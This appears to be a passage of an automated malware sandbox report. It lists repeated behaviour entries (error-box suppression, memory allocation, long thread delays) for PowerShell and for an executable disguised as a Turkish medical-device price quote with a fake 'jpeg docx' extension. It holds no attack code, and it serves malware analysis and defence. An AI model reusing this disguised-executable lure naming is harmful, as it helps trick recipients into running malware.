                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: F10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 2A20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 93C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: A3C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: A5F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: B5F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 4870000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239813Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239688Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239570Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239422Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239298Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239063Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238934Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238825Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238719Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238594Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238484Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238375Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238266Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238156Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238047Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237938Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237828Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237696Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237578Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237453Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598016Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597891Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597656Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596891Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596766Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596641Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596531Jump to behavior
